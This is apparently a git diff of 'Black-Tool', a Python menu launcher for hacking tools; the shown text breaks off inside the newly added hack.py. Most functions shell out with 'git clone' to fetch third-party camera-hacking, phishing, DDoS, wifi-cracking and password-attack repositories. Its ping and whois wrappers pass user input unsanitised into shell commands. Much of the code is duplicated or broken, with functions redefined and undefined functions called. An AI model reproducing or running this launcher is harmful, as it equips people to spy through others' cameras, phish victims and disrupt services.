---------------Search----------------- -| : """) - time.sleep(1) - if system == 'Linux': - os.system("firefox " + choose) - try32() - elif system == 'Mac': - os.system("firefox " + choose) - try32() - elif system == 'Windows': - os.system("start chrome " + choose) - try32() - else: - print(Black_Tool_Search_Err) - try29() -def black_Tool_Search_2(): - cls() - banner() - choose = input(""" ---------------Search----------------- -| : """) - time.sleep(1) - if system == 'Linux': - os.system("firefox " + choose) - try32() - elif system == 'Mac': - os.system("firefox " + choose) - try32() - elif system == 'Windows': - os.system("start chrome " + choose) - try32() - else: - print(Black_Tool_Search_Err) - try30() -def black_ip_search(): - cls() - print("{1}.Online") - print("{2}.Installing IPz pkg") - print("{99}.mein menu") - choose12 = input(opt) - if choose12 == '1': - start_ip_search() - elif choose12 == '2': - cls() - installing_ipz = subprocess.getoutput("git clone https://github.com/mrprogrammer2938/IPz") - print(installing_ipz) - try14() - elif choose12 == '99': - Black_Tool_Start() - else: - black_ip_search() -def black_Cam_Hacking(): - cls() - print(color.blue) - os.system("figlet Cam Hacking") - print(color.End) - print("\n{1}.Cam-Hackers") - print("{2}.Cam-Hack-ang") - print("{3}.say cheese") - print("{4}.say Master") - print("{5}.Cam-Phish") - print("{99}.mein menu") - choose3 = input(opt) - if choose3 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938") - try19() - elif choose3 == '2': - cls() - os.system("git clone https://github.com/AngelSecurityTeam/Cam-Hackers") - try19() - elif choose3 == '3': - cls() - os.system("git clone https://github.com/keralahackers/saycheese") - try19() - elif choose3 == '4': - cls() - os.system("git clone https://github.com/joshkar/SayMaster") - try19() - elif choose3 == '5': - cls() - os.system("git clone https://github.com/techchipnet/CamPhish/ Cam-Phish/") - try19() - elif choose3 == '99': - menu() - else: - black_Cam_Hacking() -def black_Cam_Hacking_2(): - cls() - print(color.blue) - os.system("figlet Cam Hacking") - print(color.End) - print("\n{1}.Cam-Hackers") - print("{2}.Cam-Hack-ang") - print("{3}.say cheese") - print("{4}.say Master") - print("{5}.Cam-Phish") - print("{99}.mein menu") - choose3 = input(opt) - if choose3 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938") - try19() - elif choose3 == '2': - cls() - os.system("git clone https://github.com/AngelSecurityTeam/Cam-Hackers") - try19() - elif choose3 == '3': - cls() - os.system("git clone https://github.com/keralahackers/saycheese") - try19() - elif choose3 == '4': - cls() - os.system("git clone https://github.com/joshkar/SayMaster") - try19() - elif choose3 == '5': - cls() - os.system("git clone https://github.com/techchipnet/CamPhish/ Cam-Phish/") - try19() - elif choose3 == '99': - black_2() - else: - black_Cam_Hacking_2() -def try32(): - try_again_1 = input("\nDo you want to try again? [y/n] ") - if try_again_1 == 'y': - black_Tool_Search() - elif try_again_1 == 'n': - try29() - else: - try32() -def try32(): - try_again_2 = input("\nDo you want to try again? [y/n] ") - if try_again_2 == 'y': - black_Tool_Search_2() - elif try_again_2 == 'n': - try30() - else: - try32() -def Black_Tool_Shell(): - try: - cls() - banner() - while True: - option = input(opt_shell) - option = option.split() - if option == []: - pass - elif option[0] == 'back': - menu() - elif option[0] == 'exit': - print(color.green + "\nExiting..." + color.End) - sys.exit() - elif option[0] == 'quit': - print(color.green + "\nExiting..." + color.End) - sys.exit() - elif option[0] == 'help': - print(Black_Tool_Shell_Help) - elif option[0] == 'options': - print(""" ------------------- -Ping Test | ------------------- -""") - elif option[0] == 'set': - if len(option) < 3: - print(""" ---------------- -Host | -Packet | ---------------- -""") - else: - if option[1] == 'host': - host = option[2] - print("\nHost ==> " + host + "\n") - elif option[1] == 'packet': - packet = option[2] - print("\nPacket ==> " + packet + "\n") - else: - print("\nPlease, Usage: set [Option]...\n") - elif option[0] == 'clear': - cls() - elif option[0] == 'banner': - banner() - elif option[0] == 'exploit': - print(color.org) - start_pingtest = subprocess.getoutput(f"ping -w {packet} {host}") - print(start_pingtest) - print(color.End) - elif option[0] == 'run': - print(color.org) - start_pingtest = subprocess.getoutput(f"ping -w {packet} {host}") - print(start_pingtest) - print(color.End) - elif option[0] == 'cls': - cls() - elif option[0] == 'version': - print(Black_Tool_Version) - else: - print(option[0] + color.red + "\n Not Found!" + color.End) - except: - try_to_Black_Tool() -def Black_Tool_Shell_2(): - try: - cls() - banner() - while True: - option = input(opt_shell) - option = option.split() - if option == []: - pass - elif option[0] == 'back': - black_2() - elif option[0] == 'exit': - print(color.green + "\nExiting..." + color.End) - sys.exit() - elif option[0] == 'quit': - print(color.green + "\nExiting..." + color.End) - sys.exit() - elif option[0] == 'help': - print(Black_Tool_Shell_Help) - elif option[0] == 'options': - print(""" ------------------- -Ping Test | ------------------- -""") - elif option[0] == 'set': - if len(option) < 3: - print(""" ---------------- -Host | -Packet | ---------------- -""") - else: - if option[1] == 'host': - host = option[2] - print("\nHost ==> " + host + "\n") - elif option[1] == 'packet': - packet = option[2] - print("\nPacket ==> " + packet + "\n") - else: - print("\nPlease, Usage: set [Option]...\n") - elif option[0] == 'clear': - cls() - elif option[0] == 'banner': - banner() - elif option[0] == 'exploit': - print(color.org) - start_pingtest = subprocess.getoutput(f"ping -w {packet} {host}") - print(start_pingtest) - print(color.End) - elif option[0] == 'run': - print(color.org) - start_pingtest = subprocess.getoutput(f"ping -w {packet} {host}") - print(start_pingtest) - print(color.End) - elif option[0] == 'cls': - cls() - elif option[0] == 'version': - print(Black_Tool_Version) - else: - print(option[0] + color.red + "\n Not Found!" + color.End) - except: - try_to_Black_Tool() -def try29(): - try_to_Black_Tool_menu = input("\npress Enter...") - if try_to_Black_Tool_menu == '': - menu() - else: - menu() -def try30(): - try_to_Black_Tool_menu = input("\npress Enter...") - if try_to_Black_Tool_menu == '': - cls() - black_2() - else: - cls() - black_2() -def try32(): - try_again_2 = input("\nDo you want to try again? [y/n] ") - if try_again_2 == 'y': - black_Tool_Search() - elif try_again_2 == 'n': - try29() - else: - try32() -def try32(): - try_to_Black_Tool_5 = input("\npress Enter...") - if try_to_Black_Tool_5 == '': - black() - else: - black() -def try33(): - try_to_Black_Tool_6 = input("\nDo you want to try again? [y/n] ") - if try_to_Black_Tool_6 == 'y': - cls() - black_2() - elif try_to_Black_Tool_6 == 'n': - try30() - else: - try33() -def try_to_Black_Tool(): - try_again_3 = input("\npress Enter...") - if try_again_3 == '': - menu() - else: - menu() -def try_to_Black_Tool_2(): - try_again_4 = input("\npress Enter...") - if try_again_4 == '': - black_2() - else: - black_2() -def Black_Tool_Command_2(): - try_to_help_Black_Tool_Command = print(""" - clear - cls - banner - version - back - help: - clear | clear banner - cls | clear banner - banner | show Black Tool banner - version | show Black Tool Version - back | back banner on Black Tool Menu - - """) - try26() -def black_tool_help(): - print(""" -Start Tool at: """ + color.green + str(black_Tool_date) + color.blue + """ -Black-Tool""" + color.End + """ Usage: - --start start Hack Menu! - --install + pkg - --clone + Repositories - --version Black-Tool version - --help + Black-Tool Help -""") -def Black_Tool_Command(): - try_to_help_Black_Tool_Command = print(""" - clear - cls - banner - version - back - help: - clear | clear banner - cls | clear banner - banner | show Black Tool banner - version | show Black Tool Version - back | back banner on Black Tool Menu - - """) - try25() -def black_portscan(): - cls() - print("\n{1}.Online") - print("{2}.Installing Portscan") - print("{3}.mein menu") - choose10 = input(opt) - if choose10 == '1': - portscan_attack() - elif choose10 == '2': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Portscan") - try4() - elif choose10 == '3': - Black_Tool_Start() - else: - black_portscan() -def black_ddosattack(): - cls() - os.system("git clone https://github.com/mrprogrammer2938/DDos-Attack") - try4() -def black_ping(): - cls() - host3 = input(ip) - packet = input(packet_2) - time.sleep(2) - c = subprocess.getoutput("ping -w " + packet + " " + host3) - print(c) - time.sleep(2) - try4() -def start_ip_search(): - cls() - web2 = input(ip) - time.sleep(1) - sock = socket.gethostbyname(web2) - print("Ip: " + sock) - try13() -def try19(): - try_to_camhack = input("\npress Enter...") - if try_to_camhack == '': - black_Cam_Hacking() - else: - black_Cam_Hacking() -def try4(): - try_to_mein1 = input("\npress Enter...") - if try_to_mein1 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def try20(): - try_to_Phishing = input("\npress Enter...") - if try_to_Phishing == '': - black_Phishing() - else: - black_Phishing() -def try25(): - try_to_black_menu_2 = input("\npress Enter...") - if try_to_black_menu_2 == '': - menu() - else: - menu() -def banner(): - print(color.green + """ - ███████████ ████ █████ ███████████ ████ - ░░███░░░░░███░░███ ░░███ ░█░░░███░░░█ ░░███ - ░███ ░███ ░███ ██████ ██████ ░███ █████ ░ ░███ ░ ██████ ██████ ░███ - ░██████████ ░███ ░░░░░███ ███░░███ ░███░░███ ░███ ███░░███ ███░░███ ░███ - ░███░░░░░███ ░███ ███████ ░███ ░░░ ░██████░ ░███ ░███ ░███░███ ░███ ░███ - ░███ ░███ ░███ ███░░███ ░███ ███ ░███░░███ ░███ ░███ ░███░███ ░███ ░███ - ███████████ █████░░████████░░██████ ████ █████ █████ ░░██████ ░░██████ █████ - ░░░░░░░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░ \n""" + color.End) -def black_weblocation(): - cls() - print(exm) - site = input(ip) - try: - search = ipapi.location(ip=site, key=None) - print("\n") - print(Fore.RED + "[~] " + Fore.WHITE + "Ip: " + Fore.GREEN + search["ip"]) - print(Fore.RED + "[~] " + Fore.WHITE + "City " + Fore.GREEN + search["city"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Region " + Fore.GREEN + search["region"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Country: " + Fore.GREEN + search["country"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Org: " + Fore.GREEN + search["org"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Time Zone: " + Fore.GREEN + search["timezone"]) - print(Fore.RED + "[~] " + Fore.WHITE + "Languages: " + Fore.GREEN + search["languages"]) - time.sleep(2) - except: - print(color.green + "\nPlease" + color.red + ", Check Ip!\n") - time.sleep(1) - try4() -def portscan_attack(): - cls() - host = input(ip) - attack_portscan = requests.get("https://api.hackertarget.com/nmap/?q=" + host).text - print(attack_portscan) - time.sleep(2) - try6() -def try26(): - try_to_black_menu_2 = input("\npress Enter...") - if try_to_black_menu_2 == '': - black_2() - else: - black_2() -def black_whois_lookup(): - cls() - host5 = input(ip) - time.sleep(1) - print(color.white_light) - attack_whois = subprocess.getoutput("whois " + host5) - print(attack_whois) - time.sleep(2) - try7() -def try18(): - try_to_webhacking = input("\npress Enter...") - if try_to_webhacking == '': - black_webhacking() - else: - black_webhacking() -def Developer(): - os.system("figlet -f slant Black-Tool|lolcat") - print(color.green + "This code write by " + color.blue + "Mr.nope" + color.End) - print(color.red + "\nVersion: " + color.darkblue + "1.4.0" + color.End) - print(color.org + "Github: " + color.green + "https://github.com/mrprogrammer2938" + color.End) - time.sleep(2) - try25() -def try13(): - try_to_search_ip = input("\nDo you want to try again? [y/n] ") - if try_to_search_ip == 'y': - start_search_ip() - elif try_to_search_ip == 'n': - try12() - else: - try13() -def try6(): - try_again_2 = input("\nDo you want to try again? [y/n] ") - if try_again_2 == 'y': - portscan_attack() - elif try_again_2 == 'n': - try5() - else: - try6() -def try15(): - try_to_menu_2_3 = input("\npress Enter...") - if try_to_menu_2_3 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def black_Phishing(): - cls() - print(color.blue) - os.system("figlet Phishing") - print(color.End) - print("\n{1}.setoolkit") - print("{2}.zphisher") - print("{3}.nex-Phisher") - print("{4}.Social Phish") - print("{5}.Black-phish") - print("{6}.Phish-Mailer") - print("{99}.mein menu") - choose4 = input(opt) - if choose4 == '1': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/") - try20() - elif choose4 == '2': - cls() - os.system("git clone https://github.com/htr-tech/zphisher") - try20() - elif choose4 == '3': - cls() - os.system("git clone https://github.com/htr-tech/nexphisher") - try20() - elif choose4 == '4': - cls() - os.system("git clone https://github.com/xHak9x/SocialPhish") - try20() - elif choose4 == '5': - cls() - os.system("git clone https://github.com/iinc0gnit0/BlackPhish") - try20() - elif choose4 == '6': - cls() - os.system("git clone https://github.com/BiZken/PhishMailer") - try20() - elif choose4 == '99': - menu() - else: - black_Phishing() -def black_Phishing_2(): - cls() - print(color.blue) - os.system("figlet Phishing") - print(color.End) - print("\n{1}.setoolkit") - print("{2}.zphisher") - print("{3}.nex-Phisher") - print("{4}.Social Phish") - print("{5}.Black-phish") - print("{6}.Phish-Mailer") - print("{99}.mein menu") - choose4 = input(opt) - if choose4 == '1': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/") - try20() - elif choose4 == '2': - cls() - os.system("git clone https://github.com/htr-tech/zphisher") - try20() - elif choose4 == '3': - cls() - os.system("git clone https://github.com/htr-tech/nexphisher") - try20() - elif choose4 == '4': - cls() - os.system("git clone https://github.com/xHak9x/SocialPhish") - try20() - elif choose4 == '5': - cls() - os.system("git clone https://github.com/iinc0gnit0/BlackPhish") - try20() - elif choose4 == '6': - cls() - os.system("git clone https://github.com/BiZken/PhishMailer") - try20() - elif choose4 == '99': - black_2() - else: - black_Phishing_2() -def try14(): - try_to_menu2_2 = input("\npress Enter...") - if try_to_menu2_2 == '': - black_ip_search() - else: - black_ip_search() -def try_to_black_menu(): - try4 = input("\npress Enter...") - if try4 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def try5(): - try_again_1 = input("\npress Enter...") - if try_again_1 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -def black_wirless_Attack(): - cls() - print(color.blue) - os.system("figlet Wirless Attack") - print(color.End) - print("\n{1}.wifite") - print("{2}.Airattackit") - print("{3}.wifispy") - print("{4}.wifi-God") - print("{5}.wifi-cracker") - print("{99}.mein menu") - choose5 = input(opt) - if choose5 == '1': - cls() - os.system("git clone https://github.com/derv82/wifite") - try21() - elif choose5 == '2': - cls() - os.system("git clone https://github.com/JoyGhoshs/Airattackit") - elif choose5 == '3': - cls() - os.system("git clone https://github.com/AresS32/wirespy") - try21() - elif choose5 == '4': - cls() - os.system("git clone https://github.com/waseem-sajjad/WifiGod") - try21() - elif choose5 == '5': - cls() - os.system("git clone https://github.com/brannondorsey/wifi-cracking") - try21() - elif choose5 == '99': - menu() - else: - black_wirless_Attack() -def black_wirless_Attack_2(): - cls() - print(color.blue) - os.system("figlet Wirless Attack") - print(color.End) - print("\n{1}.wifite") - print("{2}.Airattackit") - print("{3}.wifispy") - print("{4}.wifi-God") - print("{5}.wifi-cracker") - print("{99}.mein menu") - choose5 = input(opt) - if choose5 == '1': - cls() - os.system("git clone https://github.com/derv82/wifite") - try21() - elif choose5 == '2': - cls() - os.system("git clone https://github.com/JoyGhoshs/Airattackit") - elif choose5 == '3': - cls() - os.system("git clone https://github.com/AresS32/wirespy") - try21() - elif choose5 == '4': - cls() - os.system("git clone https://github.com/waseem-sajjad/WifiGod") - try21() - elif choose5 == '5': - cls() - os.system("git clone https://github.com/brannondorsey/wifi-cracking") - try21() - elif choose5 == '99': - black_2() - else: - black_wirless_Attack_2() -def try21(): - try_to_wirless_attack = input("\npress Enter...") - if try_to_wirless_attack == '': - black_wirless_Attack() - else: - black_wirless_Attack() -def try1(): - try_to_black_tool = input("\npress Enter...") - if try_to_black_tool == '': - menu() - else: - menu() -def black_webinfo(): - cls() - print(color.blue) - os.system("figlet Web Info") - print(color.End) - print("\n{1}.Web-Info") - print("{2}.setookit") - print("{3}.webkiller") - print("{4}.web informtion") - print("{5}.Th3inspector") - print("{99}.mein menu") - choose6 = input(opt) - if choose6 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Web-Info") - try17() - elif choose6 == '2': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit") - try17() - elif choose6 == '3': - cls() - os.system("git clone https://github.com/ultrasecurity/webkiller") - try17() - elif choose6 == '4': - cls() - os.system("git clone https://github.com/zahidin/web-information-gathering") - try17() - elif choose6 == '5': - cls() - os.system("git clone https://github.com/Moham3dRiahi/Th3inspector") - try17() - elif choose6 == '99': - menu() - else: - black_webinfo() -def black_webinfo_2(): - cls() - print(color.blue) - os.system("figlet Web Info") - print(color.End) - print("\n{1}.Web-Info") - print("{2}.setookit") - print("{3}.webkiller") - print("{4}.web informtion") - print("{5}.Th3inspector") - print("{99}.mein menu") - choose6 = input(opt) - if choose6 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/Web-Info") - try17() - elif choose6 == '2': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit") - try17() - elif choose6 == '3': - cls() - os.system("git clone https://github.com/ultrasecurity/webkiller") - try17() - elif choose6 == '4': - cls() - os.system("git clone https://github.com/zahidin/web-information-gathering") - try17() - elif choose6 == '5': - cls() - os.system("git clone https://github.com/Moham3dRiahi/Th3inspector") - try17() - elif choose6 == '99': - black_2() - else: - black_webinfo_2() -def black_tool_developer_2(): - os.system("printf '\033]2;Black-Tool\a'") - cls() - os.system("figlet -f slant Black-Tool|lolcat") - print(color.green + "\nThis code write by " + color.blue + "Mr.nope" + color.End) - print(color.prlblue + "\nProgramm Name: " + color.red + "Black-Tool" + color.End) - print(color.red + "\nVersion: " + color.darkblue + "1.4.0" + color.End) - print(color.org + "\nGithub: " + color.green + "https://github.com/mrprogrammer2938" + color.End) - time.sleep(2) - try28() -def try24(): - Err_try_to_Black_Tool = input("\npress Enter...") - if Err_try_to_Black_Tool == '': - menu() - else: - menu() -def black_soialenginners(): - cls() - print(color.blue) - os.system("figlet social Engineer") - print(color.End) - print("\n{1}.setoolkit") - print("{2}.focial") - print("{3}.fluxion") - print("{99}.mein menu") - choose7 = input(opt) - if choose7 == '1': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/") - try22() - elif choose7 == '2': - cls() - os.system("git clone https://github.com/v2-dev/awesome-social-engineering/ focial/") - try22() - elif choose7 == '3': - cls() - os.system("git clone https://github.com/FluxionNetwork/fluxion") - try22() - elif choose7 == '99': - menu() - else: - black_soialenginners() -def black_soialenginners_2(): - cls() - print(color.blue) - os.system("figlet social Engineer") - print(color.End) - print("\n{1}.setoolkit") - print("{2}.focial") - print("{3}.fluxion") - print("{99}.mein menu") - choose7 = input(opt) - if choose7 == '1': - cls() - os.system("git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/") - try22() - elif choose7 == '2': - cls() - os.system("git clone https://github.com/v2-dev/awesome-social-engineering/ focial/") - try22() - elif choose7 == '3': - cls() - os.system("git clone https://github.com/FluxionNetwork/fluxion") - try22() - elif choose7 == '99': - black_2() - else: - black_soialenginners_2() -def try22(): - try_to_Soial_Eng = input("\npress Enter...") - if try_to_Soial_Eng == '': - black_soialenginners() - else: - black_soialenginners() -def black_Hackingtools(): - cls() - print(color.blue) - os.system("figlet Hacking Tools") - print(color.End) - print("\n{1}.Hacking-Tools") - print("{2}.Hack-Tools") - print("{3}.fsociety") - print("{4}.PTool") - print("{5}.onex") - print("{6}.Kit Hack") - print("{99}.mein menu") - choose7 = input(opt) - if choose7 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/hackingtools") - try16() - elif choose7 == '2': - cls() - os.system("git clone https://github.com/Z4nzu/hackingtool") - try16() - elif choose7 == '3': - cls() - os.system("git clone https://github.com/Manisso/fsociety") - try16() - elif choose7 == '4': - cls() - os.system("git clone https://github.com/mrprogrammer2938/PTool") - try16() - elif choose7 == '5': - cls() - os.system("git clone https://github.com/rajkumardusad/onex") - try16() - elif choose7 == '6': - cls() - os.system("git clone https://github.com/AdrMXR/KitHack") - try16() - elif choose7 == '99': - menu() - else: - black_Hackingtools() -def black_Hackingtools_2(): - cls() - print(color.blue) - os.system("figlet Hacking Tools") - print(color.End) - print("\n{1}.Hacking-Tools") - print("{2}.Hack-Tools") - print("{3}.fsociety") - print("{4}.PTool") - print("{5}.onex") - print("{6}.Kit Hack") - print("{99}.mein menu") - choose7 = input(opt) - if choose7 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/hackingtools") - try16() - elif choose7 == '2': - cls() - os.system("git clone https://github.com/Z4nzu/hackingtool") - try16() - elif choose7 == '3': - cls() - os.system("git clone https://github.com/Manisso/fsociety") - try16() - elif choose7 == '4': - cls() - os.system("git clone https://github.com/mrprogrammer2938/PTool") - try16() - elif choose7 == '5': - cls() - os.system("git clone https://github.com/rajkumardusad/onex") - try16() - elif choose7 == '6': - cls() - os.system("git clone https://github.com/AdrMXR/KitHack") - try16() - elif choose7 == '99': - black_2() - else: - black_Hackingtools_2() -def try7(): - try_to_whois_attack = input("\nDo you want to try again? [y/n] ") - if try_to_whois_attack == 'y': - black_whois_lookup() - elif try_to_whois_attack == 'n': - try4() - else: - try7() -def try28(): - try_to_black_menu_4=input("\npress Enter...") - if try_to_black_menu_4 == '': - black_2() - else: - black_2() -def try23(): - try_to_DDos_Attack = input("\npress Enter...") - if try_to_DDos_Attack == '': - black_DDos_Attack() - else: - black_DDos_Attack() -def black_DDos_Attack(): - cls() - print(color.blue) - os.system("figlet DDos Attack") - print(color.End) - print("\n{1}.DDos-Attack") - print("{2}.hammer") - print("{3}.Liteddos") - print("{4}.Rave-Tool") - print("{5}.DDos-Attack-Mrx") - print("{99}.mein menu") - choose8 = input(opt) - if choose8 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/DDos-Attack") - try23() - elif choose8 == '2': - cls() - os.system("git clone https://github.com/cyweb/hammer") - try23() - elif choose8 == '3': - cls() - os.system("git clone https://github.com/4L13299/LITEDDOS") - try23() - elif choose8 == '4': - cls() - os.system("git clone https://github.com/Taguar258/Raven-Storm/ Rave-Tool/") - try23() - elif choose8 == '5': - cls() - os.system("git clone DDos-Attack-Mrx = https://github.com/Ha3MrX/DDos-Attack/ DDos-Attack-Mrx/") - try23() - elif choose8 == '99': - menu() - else: - black_DDos_Attack() -def black_DDos_Attack_2(): - cls() - print(color.blue) - os.system("figlet DDos Attack") - print(color.End) - print("\n{1}.DDos-Attack") - print("{2}.hammer") - print("{3}.Liteddos") - print("{4}.Rave-Tool") - print("{5}.DDos-Attack-Mrx") - print("{99}.mein menu") - choose8 = input(opt) - if choose8 == '1': - cls() - os.system("git clone https://github.com/mrprogrammer2938/DDos-Attack") - try23() - elif choose8 == '2': - cls() - os.system("git clone https://github.com/cyweb/hammer") - try23() - elif choose8 == '3': - cls() - os.system("git clone https://github.com/4L13299/LITEDDOS") - try23() - elif choose8 == '4': - cls() - os.system("git clone https://github.com/Taguar258/Raven-Storm/ Rave-Tool/") - try23() - elif choose8 == '5': - cls() - os.system("git clone DDos-Attack-Mrx = https://github.com/Ha3MrX/DDos-Attack/ DDos-Attack-Mrx/") - try23() - elif choose8 == '99': - black_2() - else: - black_DDos_Attack_2() -def black_Update_Uninstalling(): - cls() - os.system("figlet -f slant Black-Tool|lolcat") - print("\n{1}.Update") - print("{2}.Uninstall") - print("{99}.mein menu") - choose9 = input(opt) - if choose9 == '1': - black_update() - elif choose9 == '2': - black_uninstall() - elif choose9 == '99': - menu() - else: - black_Update_Uninstalling() -def black_Update_Uninstalling_2(): - cls() - os.system("figlet -f slant Black-Tool|lolcat") - print("\n{1}.Update") - print("{2}.Uninstall") - print("{99}.mein menu") - choose9 = input(opt) - if choose9 == '1': - black_update() - elif choose9 == '2': - black_uninstall() - elif choose9 == '99': - black_2() - else: - black_Update_Uninstalling_2() -def black_tool_developer(): - os.system("printf '\033]2;Black-Tool\a'") - cls() - os.system("figlet -f slant Black-Tool|lolcat") - print(color.green + "\nThis code write by " + color.blue + "Mr.nope" + color.End) - print(color.prlblue + "\nProgramm Name: " + color.red + "Black-Tool" + color.End) - print(color.red + "\nVersion: " + color.darkblue + "1.4.0" + color.End) - print(color.org + "\nGithub: " + color.green + "https://github.com/mrprogrammer2938" + color.End) - time.sleep(2) - try27() -def black_tool_developer_2(): - os.system("printf '\033]2;Black-Tool\a'") - cls() - os.system("figlet -f slant Black-Tool|lolcat") - print(color.green + "\nThis code write by " + color.blue + "Mr.nope" + color.End) - print(color.prlblue + "\nProgramm Name: " + color.red + "Black-Tool" + color.End) - print(color.red + "\nVersion: " + color.darkblue + "1.4.0" + color.End) - print(color.org + "\nGithub: " + color.green + "https://github.com/mrprogrammer2938" + color.End) - time.sleep(2) - try35() -def try16(): - try_to_choose_opt = input("\npress Enter...") - if try_to_choose_opt == '': - menu() - else: - menu() -def try35(): - try_to_Black_menu_7 = input("\npress Enter...") - if try_to_Black_menu_7 == '': - black_2() - else: - black_2() -def black_update(): - if system == 'Linux': - os.system("cd .. && sudo rm Black-Tool") - os.system("git clone https://github.com/mrprogrammer2938/Black-Tool") - try10() - elif system == 'Mac': - os.system("cd .. && sudo rm -r Black-Tool") - os.system("git clone https://github.com/mrprogrammer2938/Black-Tool") - try10() - elif system == 'Windows': - cls() - print("\nThis Programm Can Not Run Your OS!\n") - sys.exit() - else: - print("\nThis, Programm Can Run on Linux,MacOS\n") - time.sleep(2) - try9() -def try27(): - try_to_black_menu_3 = input("\npress Enter...") - if try_to_black_menu_3 == '': - black() - else: - black() -def try16(): - try_to_menu_installing_hackingtool = input("\npress Enter...") - if try_to_menu_installing_hackingtool == '': - black_Hackingtools() - else: - black_Hackingtools() -def black_uninstall(): - if system == 'Linux': - os.system("cd /usr/local/bin && sudo rm hack") - print("\nPlease, Using: ./uninstall in hack file") - try8() - elif system == 'Mac': - os.system("cd /usr/local/bin && sudo rm hack") - print("\nPlease, Using: ./uninstall in hack file") - try8() - elif system == 'Windows': - cls() - print("\nThis Programm Can Not Run Your OS!\n") - sys.exit() - else: - print("\nThis, Programm Can Run on +Linux,MacOs\n") - time.sleep(2) - try9() -def try17(): - try_to_webinfo = input("\npress Enter...") - if try_to_webinfo == '': - black_webinfo() - else: - black_webinfo() -def try9(): - try_to_mein2 = input("\npress Enter...") - if try_to_mein2 == '': - menu() - else: - menu() -def try10(): - try_to_mein3 = input("\npress Enter...") - if try_to_mein3 == '': - ext() - else: - ext() -def try11(): - try_again_nslookup = input("Do you want to try again? [y/n] ") - if try_again_nslookup == 'y': - black_nslookup() - elif try_again_nslookup == 'n': - try12() - else: - try11() -def try12(): - try_to_menu_5 = input("\npress Enter...") - if try_to_menu_5 == '': - Black_Tool_Start() - else: - Black_Tool_Start() -if __name__ == '__main__': - try: - arg() - except IndexError: - print("\nPlease, Usage: --help\n") - sys.exit() -cls() -# Black-Tool 1.4.0 diff --git a/hack.py b/hack.py new file mode 100644 index 0000000..f2e2ecd --- /dev/null +++ b/hack.py @@ -0,0 +1,619 @@ +#!/bin/python3 +# Black-Tool v5.5.5 +# This Tool Made By Sina Meysami +# + +import os,sys,subprocess,time,socket,random,threading +from platform import system +from art import text2art +from colorama import Fore,Back,Style,init + +init() + +class Black_Tool(): + def main_menu(self): + self.clear() + self.banner() + self.menu() + def menu(self): + print("\n") + print("{1}.Information Gathering") + print("{2}.Password Attack") + print("{3}.Wireless Attack") + print("{4}.Sniffing & Spoofing") + print("{5}.Web Attack") + print("{6}.Malware") + print("{7}.Dos Attack") + print("{8}.Cam Hacking") + print("{0}.About") + print("{99}.Exit") + command = str(input(Style.BRIGHT + "\nBlack-Tool# ")) + if (command=="1"): + self.information_gathering() + elif (command=="2"): + self.password_attack() + elif (command=="3"): + self.wireless_attack() + elif (command=="4"): + self.sniffing_spoofing() + elif (command=="5"): + self.web_attack() + elif (command=="6"): + self.malware() + elif (command=="7"): + self.dos() + elif (command=="8"): + self.cam_hacking() + elif (command=="0"): + self.about() + elif (command=="99" or command=="exit" or command=="quit"): + self.exit_blacktool() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.main_menu() + def information_gathering(self): + self.clear() + self.banner() + print("\n{1}.Nmap") + print("{2}.WPScan") + print("{3}.Setoolkit") + print("{4}.Web Info") + print("{5}.CMS Scanner") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Information-Gathering# ")) + + if command == "1": + self.clear() + print("Installing Nmap") + nmap_ins = subprocess.getoutput("apt install nmap") + print(nmap_ins) + input("Press Enter...") + self.information_gathering() + elif command == "2": + self.clear() + print("Installing WPScan") + wpscan_ins = subprocess.getoutput("git clone https://github.com/wpscanteam/wpscan") + input("Press Enter...") + self.information_gathering() + + elif command == "3": + self.clear() + print("Installing Setoolkit") + install_set = subprocess.getoutput("git clone https://github.com/trustedsec/social-engineer-toolkit") + input("Press Enter...") + self.information_gathering() + elif command == "4": + self.clear() + print("Installing Web Info") + webinfo_ins = subprocess.getoutput("git clone https://github.com/zahidin/web-information-gathering") + input("Press Enter...") + self.information_gathering() + elif command == "5": + self.clear() + print("Installing CMS Scanner") + cmsscanner_ins = subprocess.getoutput("git clone https://github.com/ajinabraham/CMSScan") + input("Press Enter...") + self.information_gathering() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.information_gathering() + def password_attack(self): + self.clear() + self.banner() + print("\n{1}.Cupp") + print("{2}.NCrack") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Password-Attack# ")) + if command == "1": + self.clear() + print("Installing Cupp") + cupp_ins = subprocess.getoutput("git clone https://github.com/Mebus/cupp") + print("Press Enter...") + self.password_attack() + elif command == "2": + self.clear() + print("Installing NCrack") + ncrack_ins = subprocess.getoutput("git clone https://github.com/nmap/ncrack") + input("Press Enter...") + self.password_attack() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.password_attack() + def wireless_attack(self): + self.clear() + self.banner() + print("\n{1}.Reaver") + 